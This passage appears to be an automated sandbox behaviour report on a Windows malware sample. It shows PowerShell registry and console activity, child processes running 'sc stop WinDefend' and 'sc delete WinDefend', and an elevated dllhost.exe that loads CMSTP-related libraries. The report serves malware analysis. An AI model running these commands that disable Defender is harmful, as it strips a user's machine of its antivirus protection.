Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1 Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes False 1 Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1 Fn
File Get Info filename = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1, type = file_attributes False 1 Fn
File Get Info filename = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1 Fn
Environment Get Environment String name = MshEnableTrace False 7 Fn
Thread 0x9c4
1 0
Category Operation Information Success Count Logfile
Module Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1 Fn
Thread 0x4b4
124 0
Category Operation Information Success Count Logfile
Environment Get Environment String name = MshEnableTrace False 19 Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1 Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1 Fn
Environment Get Environment String name = MshEnableTrace False 2 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Open filename = STD_ERROR_HANDLE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2 Fn
File Open filename = STD_OUTPUT_HANDLE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Write filename = CONOUT$, size = 79 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 79 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 62 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 17 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 57 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 79 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 25 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 54 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1 Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
File Write filename = CONOUT$, size = 1 True 1 Fn Data
Process #19: sc.exe
8 0
Information Value
ID #19
File Name c:\windows\syswow64\sc.exe
Command Line sc delete WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
Information Value
PID 0x9a4
Parent PID 0x77c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x9D4
0x75C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x00080000 0x0008ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x00200000 0x002bffff Memory Mapped File Readable, Writable False False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000620000 0x00620000 0x0071ffff Private Memory Readable, Writable True False False -
sc.exe 0x00840000 0x0084bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x9d4
8 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:41 (UTC) True 1 Fn
System Get Time type = Ticks, time = 269429 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\sc.exe, base_address = 0x840000 True 1 Fn
File Open filename = STD_OUTPUT_HANDLE True 1 Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1 Fn
Service Open database_name = SERVICES_ACTIVE_DATABASE False 1 Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1 Fn
File Write filename = STD_OUTPUT_HANDLE, size = 51 True 1 Fn Data
Process #20: sc.exe
8 0
Information Value
ID #20
File Name c:\windows\syswow64\sc.exe
Command Line sc stop WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
Information Value
PID 0x9d8
Parent PID 0x13c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xA14
0xA50
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x000f0000 0x000fffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x002c0000 0x0037ffff Memory Mapped File Readable, Writable False False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x0069ffff Private Memory Readable, Writable True False False -
sc.exe 0x00840000 0x0084bfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xa14
8 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:41 (UTC) True 1 Fn
System Get Time type = Ticks, time = 269273 True 1 Fn
Module Get Handle module_name = c:\windows\syswow64\sc.exe, base_address = 0x840000 True 1 Fn
File Open filename = STD_OUTPUT_HANDLE True 1 Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1 Fn
Service Open database_name = SERVICES_ACTIVE_DATABASE False 1 Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1 Fn
File Write filename = STD_OUTPUT_HANDLE, size = 51 True 1 Fn Data
Process #21: dllhost.exe
0 0
Information Value
ID #21
File Name c:\windows\syswow64\dllhost.exe
Command Line C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:46, Reason: RPC Server
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:22
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x200
Parent PID 0x248 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x6B8
0x264
0xF8
0x224
0x788
0x40C
0x5DC
0x794
0x468
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x00110000 0x00113fff Memory Mapped File Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00130000 0x0014efff Memory Mapped File Readable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False -
cversions.2.db 0x001e0000 0x001e3fff Memory Mapped File Readable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f6fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x0023ffff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0027ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000280000 0x00280000 0x00407fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000410000 0x00410000 0x00411fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000420000 0x00420000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x0052ffff Private Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x005cffff Private Memory Readable, Writable True False False -
dllhost.exe 0x005d0000 0x005d4fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x00000000005e0000 0x005e0000 0x00760fff Pagefile Backed Memory Readable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
private_0x00000000008a0000 0x008a0000 0x008dffff Private Memory Readable, Writable True False False -
private_0x00000000008e0000 0x008e0000 0x0091ffff Private Memory Readable, Writable True False False -
private_0x0000000000920000 0x00920000 0x0095ffff Private Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x00960000 0x0098ffff Memory Mapped File Readable True False False -
private_0x00000000009a0000 0x009a0000 0x009dffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x009e0000 0x00a45fff Memory Mapped File Readable True False False -
private_0x0000000000a50000 0x00a50000 0x00a5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000a60000 0x00a60000 0x01e5ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01e60000 0x0212efff Memory Mapped File Readable False False False -
private_0x00000000021a0000 0x021a0000 0x021dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021e0000 0x021e0000 0x022befff Pagefile Backed Memory Readable True False False -
private_0x0000000002350000 0x02350000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002400000 0x02400000 0x0243ffff Private Memory Readable, Writable True False False -
private_0x0000000002440000 0x02440000 0x0253ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002540000 0x02540000 0x02932fff Pagefile Backed Memory Readable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x753c0000 0x753edfff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x75460000 0x754abfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x754b0000 0x755a4fff Memory Mapped File Readable, Writable, Executable False False False -
cmlua.dll 0x755f0000 0x755fbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75600000 0x75608fff Memory Mapped File Readable, Writable, Executable False False False -
cmutil.dll 0x75610000 0x7561dfff Memory Mapped File Readable, Writable, Executable False False False -
cmstplua.dll 0x75620000 0x75627fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
